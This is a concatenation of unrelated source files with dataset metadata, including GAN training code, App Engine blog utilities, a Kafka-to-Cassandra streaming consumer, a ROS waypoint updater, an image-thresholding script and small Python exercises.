None\n \n previous_epoch = my_ds.epochs_completed \n\n # train critic\n for i_ in range(CRITIC_ITERS):\n batch_data = my_ds.next_batch(BATCH_SIZE) # data_gen.__next__()\n disc_cost_, _ = sess.run([disc_cost, disc_train_op], feed_dict={real_data: batch_data, disc_lr:disc_lr_.clr() })\n disc_lr_.on_batch_end()\n\n # train generator\n sess.run(gen_train_op, feed_dict={gen_lr : gen_lr_.clr()}) \n gen_lr_.on_batch_end()\n\n gen_cost2 = sess.run(gen_cost) \n\n current_epoch = my_ds.epochs_completed \n\n condition2 = current_epoch % 5 == 0\n if current_epoch > previous_epoch and condition2:\n disc_loss_record.append(disc_cost_)\n gen_loss_record.append(gen_cost2)\n epoch_record.append(my_ds.epochs_completed ) \n # print(\"Diff \"+str(current_epoch - previous_epoch))\n\n if (np.mod(iter_, FREQ) == 0) or (iter_+1 == ITERS):\n \n \"\"\"\n print(\"===> Debugging\")\n print(disc_loss_record)\n print(gen_loss_record)\n \"\"\"\n\n bot.loss_hist.append(disc_cost_)\n\n fake_samples = sess.run(fake_data) # , feed_dict={real_data: batch_data}\n # print(\"\\n==> Sum-Simplex condition: \" +str(np.sum(fake_samples, axis=1))) \n send_bot_message(bot,my_ds, iter_, ITERS, identifier)\n\n jsd_error = gan_error_all_species(fake_samples, train_set)\n current_epoch = my_ds.epochs_completed\n\n session_saver.save(sess, model_path)\n save_history(storing_path, gen_loss_record,disc_loss_record, jsd_error, current_epoch, epoch_record, 
my_ds,iter_, epochs, global_iters )\n\n \n # save_gen_samples(fake_data, disc_fake ,sess, storing_path, k) # fake_data = Generator_Softmax(BATCH_SIZE)\n \n\n utils.tick() # _iter[0] += 1\n\n if iter_ == ITERS - 1: # range(ITERS) stops at ITERS - 1, so comparing against ITERS never fired\n session_saver.save(sess, model_path)\n \n # Create gan samples\n n_samples = len(indices)\n\n k_iter = n_samples//BATCH_SIZE +1\n\n gan_samples_path = storing_path+\"gan_samples_\" +model_tag+'.csv'\n\n for k in range(k_iter):\n fake_samples = sess.run(fake_data)\n\n df = pd.DataFrame(fake_samples)\n with open(gan_samples_path, 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n # Clear variable values\n\n tf.reset_default_graph()\n\n current_epoch = my_ds.epochs_completed\n save_history(storing_path, gen_loss_record,disc_loss_record, jsd_error, current_epoch, epoch_record, my_ds,iter_, epochs, global_iters ) \n\n bot.stop_bot()\n\n # Duct tapping the size of gan sample set to avoid changing the TF Graph\n\n temp1 = pd.read_csv(gan_samples_path, header=None).values\n temp1 = temp1[0:n_samples]\n df = pd.DataFrame(temp1)\n\n with open(gan_samples_path, 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n\n print(\"Training is done\")\n","sub_path":"architectures/3N_faster_gan/train_dirichlet_interface.py","file_name":"train_dirichlet_interface.py","file_ext":"py","file_size_in_byte":14017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"2402983","text":"import os\nimport csv\nimport collections\n\ndef yieldFiles(directoryPath):\n for file in os.listdir(directoryPath):\n yield os.path.join(directoryPath, file)\n\ndef yieldLines(filePath):\n with open(filePath, newline=\"\\n\") as tsv:\n for line in tsv:\n token, count = line.split(\"\\t\")\n yield token, int(count.strip())\n\ndef writeFreqDict(directoryPath, outputPath):\n freqDict = collections.defaultdict(int)\n\n for filePath in yieldFiles(directoryPath):\n for word, count in yieldLines(filePath):\n freqDict[word.lower()] += int(count)\n\n with open(outputPath, \"w\") as out:\n for word, count in freqDict.items():\n out.write(f\"{word}\\t{count}\\n\")\n","sub_path":"src/hathi_parsing.py","file_name":"hathi_parsing.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"159296136","text":"import view\nimport datetime\nimport blog\n\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\n\n\ndef with_page(funct):\n \"\"\"Credits: http://blog.notdot.net/\"\"\"\n def decorate(self, page_slug=None):\n page = None\n if page_slug is not None:\n page = get_page(page_slug)\n if page is None:\n view.Renderer().render_error(self, 404)\n return\n funct(self, page)\n return decorate\n\ndef with_post(funct):\n \"\"\"Credits: http://blog.notdot.net/\"\"\"\n def decorate(self, year=None, month=None, day=None, slug=None):\n post = None\n if slug is not None:\n post = get_post(year, month, day, slug)\n if post is None:\n view.Renderer().render_error(self, 404)\n return\n funct(self, post)\n return decorate\n\ndef with_link(funct):\n \"\"\"Credits: http://blog.notdot.net/\"\"\"\n def decorate(self, year=None, month=None, day=None, slug=None):\n link = None\n if slug is not None:\n link = get_link(year, month, day, slug)\n if link is None:\n view.Renderer().render_error(self, 404)\n return\n funct(self, link)\n return decorate\n\ndef markdown(text, **kwargs):\n \"\"\"Converts given 
`text` to html using python-markdown.\n\n This is meant to centralize markdown usage throughout Bizarrice.\n Keyword list arguments:\n * extensions: replaces every preset extension for the ones given.\n * extra: appends given extensions to the preset list.\n Every other initialization keyword argument for python-markdown is\n accepted and passed without validation. Use with care.\"\"\"\n import import_wrapper\n import_wrapper.fix_sys_path()\n from markdown import Markdown\n extensions = kwargs.pop('extensions', False) or ['extra', 'codehilite',\n 'toc']\n extensions += kwargs.pop('extra', [])\n md = Markdown(extensions=extensions, **kwargs)\n return md.convert(text)\n\ndef slugify(value):\n \"\"\"\n Adapted from Django's django.template.defaultfilters.slugify.\n \"\"\"\n import re\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s-]', '', value).strip().lower())\n return re.sub('[-\\s]+', '-', value)\n\ndef get_post(year, month, day, slug): #{{{\n cached_id = 'post/%s/%s/%s/%s' % (year, month, day, slug)\n post = memcache.get(cached_id)\n if post is None:\n year = int(year)\n month = int(month)\n day = int(day)\n\n # Build the time span to check for the given slug\n start_date = datetime.datetime(year, month, day)\n time_delta = datetime.timedelta(days=1)\n end_date = start_date + time_delta\n\n # Create a query to check for slug uniqueness in the specified time span\n query = blog.Post.all()\n query.filter('pub_date >= ', start_date)\n query.filter('pub_date < ', end_date)\n query.filter('slug = ', slug)\n post = query.get()\n memcache.set(cached_id, post)\n return post\n#}}}\n\ndef get_link(year, month, day, slug): #{{{\n cached_id = 'link/%s/%s/%s/%s' % (year, month, day, slug)\n link = memcache.get(cached_id)\n if link is None:\n year = int(year)\n month = int(month)\n day = int(day)\n\n # Build the time span to check for the given slug\n start_date = datetime.datetime(year, month, day)\n time_delta = datetime.timedelta(days=1)\n end_date = start_date + time_delta\n\n # Fetch the link based on the timespan\n query = blog.Link.all()\n query.filter('pub_date >= ', start_date)\n query.filter('pub_date < ', end_date)\n query.filter('slug = ', slug)\n link = query.get()\n memcache.set(cached_id, link)\n return link\n#}}}\n\ndef get_page(slug): #{{{\n page = memcache.get('page-%s' % slug)\n if page is None:\n query = blog.Page.all()\n query.filter('slug = ', slug)\n page = query.get()\n memcache.set('page-%s' % slug, page)\n return page\n#}}}\n\ndef get_archive_list():\n \"\"\"Return a list of the archive months and their article counts.\"\"\"\n import import_wrapper\n import_wrapper.load_zip('dateutil')\n from dateutil.relativedelta import relativedelta\n\n # Attempt to get a memcache'd copy first\n archive = memcache.get('archive_list')\n if archive is not None:\n return archive\n\n # Get the date of the oldest entry\n query = db.Query(blog.Publishable)\n query.order('pub_date')\n oldest = query.get()\n\n # Handle the situation where there are no posts\n if oldest is None:\n memcache.set('archive_list', [])\n return []\n\n # Create a date delta for moving ahead 1 month\n plus_one_month = relativedelta(months=+1)\n\n # Calculate the start and end dates for the archive\n start_date = datetime.date(oldest.pub_date.year, oldest.pub_date.month, 1)\n end_date = datetime.date.today()\n end_date = datetime.date(end_date.year, end_date.month, 1) + plus_one_month\n\n # Loop through each month in the time span and count the 
number\n # of entries made in that month\n archive = []\n current_date = start_date\n while current_date < end_date:\n next_date = current_date + plus_one_month\n\n query = db.Query(blog.Publishable)\n query.filter('pub_date >= ', current_date)\n query.filter('pub_date < ', next_date)\n\n archive.append({\n 'date': current_date,\n 'count': query.count(1000),\n 'url': '/%04d/%02d' % (current_date.year, current_date.month),\n })\n current_date = next_date\n\n memcache.set('archive_list', archive)\n return archive\n\ndef get_tag_list():\n \"\"\"Return a list of the tags and their article counts\"\"\"\n # Attempt to get a memcache'd copy first\n tag_list = memcache.get('tag_list')\n if tag_list is not None:\n return tag_list\n\n # Build a list of tags and their article counts\n tag_list = {}\n query = blog.Post.all()\n for post in query:\n for tag in post.tags:\n if tag in tag_list:\n tag_list[tag] += 1\n else:\n tag_list[tag] = 1\n\n # Sort the tag dictionary by name into a list\n # and add each tag's URL\n sorted_tag_list = []\n for tag in sorted(tag_list.iterkeys()):\n sorted_tag_list.append({\n 'tag': tag,\n 'count': tag_list[tag],\n 'url': '/tag/%s' % (tag),\n })\n\n memcache.set('tag_list', sorted_tag_list)\n return sorted_tag_list\n\ndef get_page_list():\n pages = memcache.get('page_list')\n if pages is not None:\n return pages\n\n page_list = []\n page_list = blog.Page.all().order('index').fetch(1000)\n memcache.set('page_list', page_list)\n return page_list\n","sub_path":"blog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479921774","text":"from gsrest.db import get_connection\nfrom openapi_server.models.block import Block\nfrom openapi_server.models.blocks import Blocks\nfrom openapi_server.models.tx import TxAccount\nfrom openapi_server.models.block_tx_utxo import BlockTxUtxo\nfrom gsrest.util.values import convert_value\nfrom gsrest.service.rates_service import get_rates\nfrom flask import Response, stream_with_context\nfrom gsrest.util.csvify import create_download_header, to_csv\n\n\ndef from_row(currency, row, rates):\n if currency == 'eth':\n return TxAccount(\n tx_hash=row.hash.hex(),\n timestamp=row.block_timestamp,\n height=row.block_number,\n values=convert_value(currency, row.value, rates))\n return BlockTxUtxo(\n no_inputs=row.no_inputs,\n no_outputs=row.no_outputs,\n total_input=convert_value(currency, row.total_input, rates),\n total_output=convert_value(currency, row.total_output, rates),\n tx_hash=row.tx_hash.hex())\n\n\ndef block_from_row(currency, row):\n if currency == 'eth':\n return Block(\n height=row.number,\n block_hash=row.hash.hex(),\n no_txs=row.transaction_count,\n timestamp=row.timestamp)\n return Block(\n height=row.height,\n block_hash=row.block_hash.hex(),\n no_txs=row.no_transactions,\n timestamp=row.timestamp)\n\n\ndef get_block(currency, height):\n db = get_connection()\n row = db.get_block(currency, height)\n if not row:\n raise RuntimeError(\"Block {} not found\".format(height))\n return block_from_row(currency, row)\n\n\ndef list_blocks(currency, page=None):\n db = get_connection()\n results, paging_state = db.list_blocks(currency, page)\n block_list = [block_from_row(currency, row)\n for row in results.current_rows]\n\n return Blocks(paging_state, block_list)\n\n\ndef list_block_txs(currency, height):\n db = get_connection()\n txs = db.list_block_txs(currency, height)\n\n if txs is None:\n raise 
RuntimeError(\"Block {} not found\".format(height))\n rates = get_rates(currency, height)\n\n return [from_row(currency, tx, rates['rates'])\n for tx in txs]\n\n\ndef list_block_txs_csv(currency, height):\n def query_function(_):\n result = list_block_txs(currency, height)\n txs = [tx.to_dict() for tx in result]\n return None, txs\n return Response(stream_with_context(to_csv(query_function)),\n mimetype=\"text/csv\",\n headers=create_download_header(\n 'transactions of block {} ({}).csv'\n .format(height, currency.upper())))\n","sub_path":"gsrest/service/blocks_service.py","file_name":"blocks_service.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"522773007","text":"from __future__ import print_function\n\nimport sys\n\nfrom pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\n\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\n\n\nimport json\n\ndef process_RDD(RDD):\n lines = RDD.collect()\n for line in lines:\n process_line(line)\n #RDD.foreach(process_line)\n\ndef process_line(line):\n line = line.rstrip()\n fields = json.loads(line)\n try:\n target_id = fields['transactions'][0]['target']['id']\n actor_id = fields['actor']['id']\n message = fields['message']\n target_name = fields['transactions'][0]['target']['name']\n actor_name = fields['actor']['name']\n time = fields['updated_time']\n payment_id = fields['payment_id']\n# payment_id.pprint() \n transaction = sqlContext.createDataFrame([(payment_id,actor_id,message,target_id,time),], [\"payment_id\",\"actor_id\",\"message\",\"target_id\",\"time\"])\n user = sqlContext.createDataFrame([(target_id,target_name),(actor_id,actor_name),], [\"id\",\"name\"])\n user.show()\n transaction.write.format(\"org.apache.spark.sql.cassandra\").mode('append').options(table=\"transactions\", keyspace=\"venmo_streaming\").save()\n user.write.format(\"org.apache.spark.sql.cassandra\").mode('append').options(table=\"user\", keyspace=\"venmo_streaming\").save()\n except:\n pass\n#\n\nif __name__ == \"__main__\":\n\n\n sc = SparkContext(appName=\"PythonStreamingDirectKafkaWordCount\")\n sqlContext = SQLContext(sc)\n\n\n# file_graph_obj = open(\"/home/ubuntu/Graph/venmo_1370291832.json\",'r')\n\n# for line in file_graph_obj.readlines(20):\n# process_line(line)\n\n# exit()\n\n\n ssc = StreamingContext(sc, 2)\n brokers = \"ec2-52-40-166-123.us-west-2.compute.amazonaws.com:9092\"\n topic = \"venmo2\"\n\n kvs = KafkaUtils.createDirectStream(ssc, [topic], {\"metadata.broker.list\": brokers})\n lines = kvs.map(lambda x: x[1])\n# count2=lines.count()\n# lines.pprint()\n lines.foreachRDD(process_RDD)\n\n #count2.pprint()\n\n ssc.start()\n ssc.awaitTermination()\n\n\n","sub_path":"util/streaming_consumer.py","file_name":"streaming_consumer.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289020995","text":"def create_email_response(orders):\n body = [summarize(order) for order in orders] if orders else [ERROR_MESSAGE]\n return '\\n\\n'.join((\"Sehr geehrte Kundin / Kunde\", *body, 'Vielen dank'))\n\ndef summarize(order):\n resp = [\n f'Die Bestellung mit Ordnungsnummer {order.po} hat jetzt folgende Positionen: {order.positions}.']\n if \"elk\" in order.categories:\n resp.append('Endlieferung wurde gesetzt.')\n if \"erk\" in order.categories:\n resp.append('Endrechnung wurde 
gesetzt.')\n resp.append('Die Bestellung ist immer noch offen.' if order.is_open else 'Bestellung ist jetzt geschlossen.')\n\n return '\\n'.join(resp)\n\nERROR_MESSAGE = \"\"\"leider haben wir keine gueltige Produktbestellungnummern von Ihnen erhalten.\nEin Produktbestellungnummer besteht aus 10-stelligem Ziffer.\nBitte bepruefen Sie nochmal Ihre Produktbestellung.\"\"\"\n","sub_path":"MainService/gpt3/create_email_from_json.py","file_name":"create_email_from_json.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"129957341","text":"import os\nimport configparser\n\n\ndef load_config(config_path):\n config = None\n if os.path.isfile(config_path):\n config = configparser.ConfigParser()\n try:\n config.optionxform = str\n config.read(config_path)\n except:\n print(\"Error reading config file\")\n else:\n print(\"Error, config file does not exist\")\n return config\n\n\ndef save_config(config, config_path):\n with open(config_path, \"w\") as cfg:\n try:\n config.write(cfg)\n except:\n print(\"Error writing config file\")\n\n\ndef load_user(config, user_name):\n user_items = None\n try:\n user_items = dict(config.items(user_name))\n except:\n print(\"Error loading user credentials\")\n return user_items\n\n\ndef add_user(config, user_name, config_path):\n if user_name not in config.sections():\n try:\n config.add_section(user_name)\n except:\n print(\"Error adding new user section, for user_name \" + user_name)\n else:\n print(\"Error, user \" + user_name + \" already exists\")\n save_config(config, config_path)\n\n\ndef set_user_items(config, user_name, user_items):\n for key in list(user_items.keys()):\n try:\n config.set(user_name, key, user_items[key])\n except:\n print(\"Error setting config key \" + key + \" with value \" +\n str(user_items[key]) + \" for user_name \" + user_name)\n return config\n\n\ndef update_config(config_path, user_name, user_items):\n config = load_config(config_path)\n if user_name not in config.sections():\n add_user(config, user_name, config_path)\n config = set_user_items(config, user_name, user_items)\n save_config(config, config_path)\n\n\ndef create_config(config_path):\n if not os.path.isdir(os.path.dirname(config_path)):\n os.makedirs(os.path.dirname(config_path))\n open(config_path, 'a').close()\n","sub_path":"tests/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444648633","text":"from json import encoder\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom disease.paralleldt import dt\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport pandas as pd\nimport disease.inbuilt as inbuilt\nfrom disease.naivebayes import soln\nfrom disease.knn import knn\nfrom disease.decisiontree import decisiontree\nimport operator\n# Create your views here.\ndef home(request):\n return render(request,'diagnose/newindex.html')\n\n\n@csrf_exempt\ndef diangnose(request):\n symp=request.POST.get(\"symptoms\")\n s=symp.split(',')\n sys=[]\n i=0\n df=pd.read_csv(\"disease/Training.csv\",header=0)\n cols=list(df.columns)[:-1]\n while(i4):\n for i in range(len(top_diseases)-4):\n top_diseases.popitem()\n print(\"top-disease : \", top_diseases)\n\n # print(\"Values : \", list(top_diseases.values()))\n # print(\"Keys : \", list(top_diseases.keys()))\n\n\n vals = [round(val,2) for val in 
top_diseases.values() ]\n context['top_diseases'] = {'diseases': dict(zip(list(top_diseases.keys()),vals)), 'names': json.dumps(list(top_diseases.keys())), 'scores':list(top_diseases.values())}\n print(context)\n return render(request, 'diagnose/diagnosedashextended.html', context)\n\ndef diangnose2(request):\n symp=request.POST.get(\"symptoms\")\n s=symp.split(',')\n sys=[]\n i=0\n df=pd.read_csv(\"disease/Training.csv\",header=0)\n cols=list(df.columns)[:-1]\n while(i> sum_all([1,2,3,4,5])\n\n실행결과:\n15\n\n\"\"\"\n\ndef sum_all(list):\n x = 0\n for i in list:\n x += i\n print(x)\n\nsum_all([1,2,3,4,5])\n\n\n# 2. 인자로 전달된 리스트에 저장되어 있는 모든 값들을 역순으로 출력하는 함수를 만들어보자. 일례로 다음과 같은 실행결과를 보여야 한다.\n\n\"\"\"\n>> show_reverse([1,2,3,4,5])\n\n실행결과:\n5 4 3 2 1\n\n\n>> show_reverse(\"ABCDEFG\")\n\n실행결과:\nG F E D C B A\n\n\"\"\"\n\ndef show_reverse(list):\n for i in range(1, len(list)+1):\n print(list[-i], end=' ')\n\nshow_reverse([1,2,3,4,5])\nprint('\\r')\nshow_reverse(\"ABCDEFG\")\n\n","sub_path":"EX_05-4.py","file_name":"EX_05-4.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30065642","text":"#!/usr/bin/python3\nimport sys\n\nargv = sys.argv[1:]\nargc = len(argv)\n\ntxt_arguments = 's' if argc != 1 else ''\nend_string = ':' if argc > 0 else '.'\n\nif __name__ == '__main__':\n print('{} argument{}{}'.format(argc, txt_arguments, end_string))\n\n if argc == 0:\n exit(0)\n\n for i, arg in enumerate(argv, start=1):\n print('{}: {}'.format(i, arg))\n","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"469958057","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom styx_msgs.msg import Lane, Waypoint\n\nimport math\n\nfrom geometry_msgs.msg import TwistStamped\nfrom std_msgs.msg import Int32\n\nimport sys\nimport tf\n\nfrom utilities.kdtree import kdtree\nfrom utilities.hysteresis import hysteresis\n\n\n'''\nThis node will publish waypoints from the car's current position to some `x` distance ahead.\nAs mentioned in the doc, you should ideally first implement a version which does not care\nabout traffic lights or obstacles.\nOnce you have created dbw_node, you will update this node to use the status of traffic lights too.\nPlease note that our simulator also provides the exact location of traffic lights and their\ncurrent status in `/vehicle/traffic_lights` message. You can use this message to build this node\nas well as to verify your TL classifier.\nTODO (for Yousuf and Aaron): Stopline location for each traffic light.\n'''\n\nLOOKAHEAD_WPTS = 200 # Number of waypoints we will publish. 
You can change this number\nACC_MIN = -0.8\nDIST_MIN = 1\n\n\nclass WaypointUpdater(object):\n def __init__(self):\n rospy.init_node('waypoint_updater')\n #rospy.logwarn(\"debugging: wapoint_updater.py - initialization - line38\")\n rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n rospy.Subscriber('/base_waypoints', Lane, self.wpts_cb)\n\n # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below\n rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb)\n rospy.Subscriber('/current_velocity', TwistStamped, self.curr_vel_cb, queue_size=1)\n\n self.final_wpts_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)\n self.speed_limit = rospy.get_param('waypoint_loader/velocity', 40) / 3.6 # Convert kph to mps\n\n # TODO: Add other member variables you need below\n self.wpt_tree = None\n self.wpt_speeds = []\n self.tf_listener = tf.TransformListener()\n self.wpt_redlight = None\n self.next_wpt = -1\n self.speed_curr = None\n self.speed_target_traj = 0.0\n self.speed_hysteresis_traj = hysteresis(2.0, 2.1, 0.0)\n self.pose_curr = None #Current pose\n self.wpts_base = None #Base waypoints\n\n rospy.spin()\n\n\n def pose_cb(self, msg):\n # TODO: Implement\n self.pose_curr = msg\n #rospy.logwarn(\"waypoint_updater:pose_cb:self.pose_curr %s\", self.pose_curr)\n\n if ((self.wpts_base == None) or (self.wpt_redlight == None) or (self.speed_curr == None)):\n #rospy.logwarn(\"debugging: wapoint_updater.py - pose_cb - line70\")\n return # Do nothing unless all msgs received\n #rospy.logwarn(\"[debugging: wapoint_updater.py - pose_cb - line72]\")\n # Find the nearest waypoint to the current position\n next_wpt = self.get_nearest_wpt(self.pose_curr.pose)\n\n # The next waypoint must be ahed of the current position\n transformed_wpt = self.trans_fromcar_tomap(self.wpts_base.waypoints[next_wpt].pose)\n\n if ((transformed_wpt != None) and (transformed_wpt.pose.position.x <= 0.0)):\n next_wpt += 1\n\n num_wpts = len(self.wpts_base.waypoints)\n #rospy.logwarn(\"waypoint_updater.py - pose_cb: num_wpts=%f\", num_wpts)\n\n if next_wpt >= num_wpts:\n next_wpt -= num_wpts\n\n #rospy.logwarn(\"debugging: wapoint_updater.py - pose_cb - line88\")\n self.calc_traj(next_wpt) # Calculate the trajectory\n next_wps = [None] * LOOKAHEAD_WPTS # Construct a set of following waypoints\n\n for _wp, wp in enumerate(range(next_wpt, next_wpt + LOOKAHEAD_WPTS)):\n wp_index = wp if (wp < num_wpts) else (wp - num_wpts)\n next_wps[_wp] = self.wpts_base.waypoints[wp_index]\n self.set_wpt_vel(next_wps, _wp, min(self.wpt_speeds[wp_index], self.get_traj_speed_at_wpt(_wp)))\n\n # Construct final_waypoints message\n lane = Lane()\n lane.waypoints = next_wps\n lane.header.frame_id = self.wpts_base.header.frame_id\n lane.header.stamp = rospy.Time(0)\n\n #rospy.loginfo(\"[debugging wapoint_updater.py - pose_cb - line103: final_waypoints published\")\n self.final_wpts_pub.publish(lane)\n \n #self.wpts_base = msg\n #pass\n\n\n def wpts_cb(self, msg):\n # TODO: Implement\n if self.wpts_base != None:\n return\n\n self.wpts_base = msg\n\n for idx_wp in range(len(self.wpts_base.waypoints)):\n self.wpts_base.waypoints[idx_wp].pose.header.frame_id = self.wpts_base.header.frame_id\n self.wpt_speeds.append(self.speed_limit)\n\n self.wpt_tree = kdtree([(wpt.pose.pose.position.x, wpt.pose.pose.position.y) for wpt in self.wpts_base.waypoints], 2)\n #pass\n\n\n def traffic_cb(self, msg):\n # TODO: Callback for /traffic_waypoint message. 
Implement\n self.wpt_redlight = msg.data\n #pass\n\n\n def obstacle_cb(self, msg):\n # TODO: Callback for /obstacle_waypoint message. We will implement it later\n pass\n\n\n ### Added custom functions\n def curr_vel_cb(self, msg):# Get current velocity\n self.speed_curr = msg.twist.linear.x\n \n def get_nearest_wpt(self, pose):# Identify the nearest path waypoint to the position\n if self.wpt_tree is None:\n return None\n\n return self.wpt_tree.closest((pose.position.x, pose.position.y))[0]\n \n\n def trans_fromcar_tomap(self, pose_curr):# Transform the car position to the map coordinate\n try:\n self.tf_listener.waitForTransform(\"base_link\", \"world\", rospy.Time(0), rospy.Duration(0.02))\n transformed_pose_curr = self.tf_listener.transformPose(\"base_link\", pose_curr)\n except (tf.Exception, tf.LookupException, tf.ConnectivityException):\n try:\n self.tf_listener.waitForTransform(\"base_link\", \"world\", rospy.Time(0), rospy.Duration(1.0))\n transformed_pose_curr = self.tf_listener.transformPose(\"base_link\", pose_curr)\n except (tf.Exception, tf.LookupException, tf.ConnectivityException):\n transformed_pose_curr = None\n rospy.logwarn(\"Failed to transform pose\")\n\n return transformed_pose_curr\n\n\n def calc_traj(self, next_wpt):# Calculate a trajectory\n speed_max = self.wpt_speeds[next_wpt]\n #rospy.logwarn(\"[wapoint_updater.py - calc_trajectory - line168] self.wpt_redlight = %f\", self.wpt_redlight)\n\n if self.wpt_redlight > 0:\n #rospy.logwarn(\"wapoint_updater.py - calc_trajectory - line171] self.wpt_redlight\")\n dist_stop = self.distance(self.wpts_base.waypoints, next_wpt, self.wpt_redlight)\n if dist_stop > DIST_MIN:\n dist_stop -= DIST_MIN\n speed_target = min(self.speed_curr, min(speed_max, math.sqrt(-2.0*ACC_MIN*dist_stop)))\n else:\n #rospy.logwarn(\"debugging: wapoint_updater.py - calc_trajectory - line177\")\n speed_target = speed_max\n \n #rospy.logwarn(\"waypoint_updater.py - calc_trajectory: speed_target=%f\", speed_target)\n\n self.speed_target_traj = self.speed_hysteresis_traj.output(speed_target)\n\n \n def get_traj_speed_at_wpt(self, wpt):# Get the expected speed at a waypoint\n return self.speed_target_traj\n\n\n def get_wpt_vel(self, wpt):\n return wpt.twist.twist.linear.x\n\n\n def set_wpt_vel(self, wpts, wpt, velocity):\n wpts[wpt].twist.twist.linear.x = velocity\n\n\n def distance(self, wpts, wp1, wp2):\n dist = 0\n dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)\n for i in range(wp1, wp2+1):\n dist += dl(wpts[wp1].pose.pose.position, wpts[i].pose.pose.position)\n wp1 = i\n return dist\n\n\nif __name__ == '__main__':\n try:\n WaypointUpdater()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start waypoint updater node.')","sub_path":"ros/src/waypoint_updater/waypoint_updater.py","file_name":"waypoint_updater.py","file_ext":"py","file_size_in_byte":7965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"590658680","text":"import os\nimport cv2\nimport random\nimport numpy as np\nfrom PIL import Image\n\ndef FileVal(path):\n listdir = os.listdir(path)\n listone = os.path.join(path, listdir[3])\n listtwo = os.listdir(listone)\n listthree = os.path.join(listone, listtwo[0])\n listfour = os.listdir(listthree)## locate the label file inside the train set\n\n list_path = os.path.join(listthree, listfour[2])\n with open(list_path, 'r') as raw_file:\n raw_data = raw_file.readlines()\n train_label = []\n for i in raw_data:\n line = i.strip().split('\\n')\n train_label.append(line[0] + '.jpg')\n a = 
len(train_label)\n num = random.sample(train_label, 230)# randomly pick the images whose pixels will be modified\n return num\n\n\ndef ChangePixel(path):\n listdir01 = os.listdir(path)\n listdir02 = os.path.join(path, listdir01[0])\n image = os.listdir(listdir02)\n num = FileVal(path)\n count = 0\n for p in num:\n index = os.path.join(listdir02, p)\n img = cv2.imread(index)\n data = np.array(img)\n # threshold all three (B, G, R) channels in one vectorized step:\n # pixels above 155 become 255, all other pixels become 0\n mask = data > 155\n data[mask] = 255\n data[~mask] = 0\n\n figure = Image.fromarray(data)\n figure.save(index)\n # figure.save(p)\n count = count + 1\n return count\n\nif __name__ == '__main__':\n #path = '/home/a401/Documents/SSD-COCO/VOCdevkit/VOC2007'\n path = '/home/a401/Documents/SSD-COCO/VOCdevkit/VOC2012'\n # a = FileVal(path)\n # print(a)\n count = ChangePixel(path)\n print(count)","sub_path":"Modify_Pixel.py","file_name":"Modify_Pixel.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"114936281","text":"import PyPDF2\r\n\r\na=PyPDF2.PdfFileReader(input(\"Give your pdf name with extension properly : \"))\r\n# print(a.documentInfo)\r\npages = a.numPages\r\nprint(\"No of pages: \",pages)\r\n\r\ndef speak(str):\r\n from win32com.client import Dispatch\r\n speak=Dispatch(\"sapi.spvoice\")\r\n speak.speak(str)\r\n\r\nfor num in range(pages):\r\n page = a.getPage(num)\r\n text = page.extractText()\r\n # print(text)\r\n speak(text)\r\n","sub_path":"25.AudioBookUserinputProject.py","file_name":"25.AudioBookUserinputProject.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"30146969","text":"import acm\nfrom DealPackageUtil import DealPackageException, FormatException, UnDecorate\nfrom DealCommands import SwitchLegsCommand\n\nclass HelperInterface(object):\n CreateFunc = None\n DEFAULT_DEFINITION = ''\n def Decorate(self, subject, gui): raise NotImplementedError\n def Open(self, subject, gui): raise NotImplementedError\n def Save(self, subject, config): raise NotImplementedError\n def DefinitionDisplayName(self, subject): raise NotImplementedError\n def MultiTradingEnabled(self, subject): raise NotImplementedError\n def Name(self, subject): raise NotImplementedError\n def DeleteSubject(self, subject, deleteTrades, trades): raise NotImplementedError\n def DeleteTrade(self, subject, trade): raise NotImplementedError\n def Trades(self, subject): raise NotImplementedError\n def IsDeletedMsg(self, subject): raise NotImplementedError\n def Originator(self, subject): raise NotImplementedError\n def Definition(self, subject): raise NotImplementedError\n def 